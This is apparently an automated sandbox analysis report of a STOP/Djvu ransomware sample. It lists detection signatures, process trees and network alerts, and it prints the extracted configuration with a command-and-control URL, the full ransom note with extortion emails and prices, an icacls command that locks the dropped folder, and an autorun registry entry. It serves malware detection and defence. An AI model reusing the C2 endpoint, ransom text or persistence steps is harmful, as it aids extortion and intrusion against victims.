Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1494419
MD5:006edf0ac466164ddc9e0ac56474fe0a
SHA1:ee9f512713af63759f11279090d2c8004762735b
SHA256:d343ea857cdf97aa0ccfd14970425c6888bd216d36ad7f6255a044bed36a4b2a
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
    • file.exe (PID: 1208 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
      • icacls.exe (PID: 2052 cmdline: icacls "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • file.exe (PID: 4616 cmdline: "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
        • file.exe (PID: 6420 cmdline: "C:\Users\user\Desktop\file.exe" --Admin IsNotAutoStart IsNotTask MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
  • file.exe (PID: 5088 cmdline: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
    • file.exe (PID: 3392 cmdline: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe --Task MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
  • file.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
    • file.exe (PID: 1208 cmdline: "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
  • file.exe (PID: 2052 cmdline: "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
    • file.exe (PID: 4856 cmdline: "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    0000000D.00000002.2476597586.0000000000400000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xffe88:$x1: C:\SystemID\PersonalID.txt
    • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0x1002ec:$s1: " --AutoStart
    • 0x100300:$s1: " --AutoStart
    • 0x103f48:$s2: --ForNetRes
    • 0x103f10:$s3: --Admin
    • 0x104390:$s4: %username%
    • 0x1044b4:$s5: ?pid=
    • 0x1044c0:$s6: &first=true
    • 0x1044d8:$s6: &first=false
    • 0x1003f4:$s7: delself.bat
    • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
      Click to see the 47 entries
      SourceRuleDescriptionAuthorStrings
      13.2.file.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        13.2.file.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        13.2.file.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xffe88:$x1: C:\SystemID\PersonalID.txt
        • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0x1002ec:$s1: " --AutoStart
        • 0x100300:$s1: " --AutoStart
        • 0x103f48:$s2: --ForNetRes
        • 0x103f10:$s3: --Admin
        • 0x104390:$s4: %username%
        • 0x1044b4:$s5: ?pid=
        • 0x1044c0:$s6: &first=true
        • 0x1044d8:$s6: &first=false
        • 0x1003f4:$s7: delself.bat
        • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        11.2.file.exe.22c15a0.1.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          11.2.file.exe.22c15a0.1.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 55 entries

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 1208, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
          Timestamp:2024-08-18T13:27:52.910290+0200
          SID:2803274
          Severity:2
          Source Port:49711
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-08-18T13:28:26.455747+0200
          SID:2833438
          Severity:1
          Source Port:49724
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-08-18T13:28:05.846309+0200
          SID:2036335
          Severity:1
          Source Port:80
          Destination Port:49719
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-08-18T13:28:21.259033+0200
          SID:2803274
          Severity:2
          Source Port:49722
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-08-18T13:28:17.138579+0200
          SID:2803274
          Severity:2
          Source Port:49721
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-08-18T13:28:26.499536+0200
          SID:2036335
          Severity:1
          Source Port:80
          Destination Port:49724
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-08-18T13:28:05.845995+0200
          SID:2036334
          Severity:1
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-08-18T13:28:02.381194+0200
          SID:2803274
          Severity:2
          Source Port:49713
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-08-18T13:28:25.517705+0200
          SID:2803274
          Severity:2
          Source Port:49723
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://cajgtus.com/test1/get.phpAvira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.phpGAvira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueAvira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4Avira URL Cloud: Label: malware
          Source: 00000006.00000002.2456931557.0000000002330000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\del
          Source: cajgtus.comVirustotal: Detection: 21%Perma Link
          Source: api.2ip.uaVirustotal: Detection: 6%Perma Link
          Source: http://cajgtus.com/test1/get.phpVirustotal: Detection: 18%Perma Link
          Source: https://api.2ip.ua/Virustotal: Detection: 6%Perma Link
          Source: http://cajgtus.com/test1/get.phpGVirustotal: Detection: 21%Perma Link
          Source: https://api.2ip.ua/geo.jsonVirustotal: Detection: 6%Perma Link
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeVirustotal: Detection: 36%Perma Link
          Source: file.exeReversingLabs: Detection: 34%
          Source: file.exeVirustotal: Detection: 36%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeJoe Sandbox ML: detected
          Source: file.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
          Source: C:\Users\user\Desktop\file.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
          Source: file.exe, 00000007.00000003.2671507983.0000000003117000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d7572a1a-b

          Compliance

          barindex
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 2.2.file.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 7.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 12.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 13.2.file.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeUnpacked PE file: 15.2.file.exe.400000.0.unpack
          Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\file.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\\Q source: file.exe, 00000007.00000003.2750546305.0000000003126000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751902769.0000000003129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751804217.0000000003127000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\* source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: file.exe, 00000007.00000003.2750642719.000000000372C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745437449.000000000372C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\*e source: file.exe, 00000007.00000003.2674265194.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2674359164.0000000000934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639828066.0000000000935000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639636291.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411433716.0000000000931000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2764248429.0000000000936000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751614715.0000000000933000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454741166.000000000362A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2735033298.000000000310F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2736854100.0000000003113000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: file.exe, 00000007.00000003.2725549066.000000000314C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724350929.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\CskZR source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638414568.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639138536.0000000003182000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\:( source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb\q source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\4 source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673632116.0000000003901000.00000004.00000020.00020000.00000000.sdmp
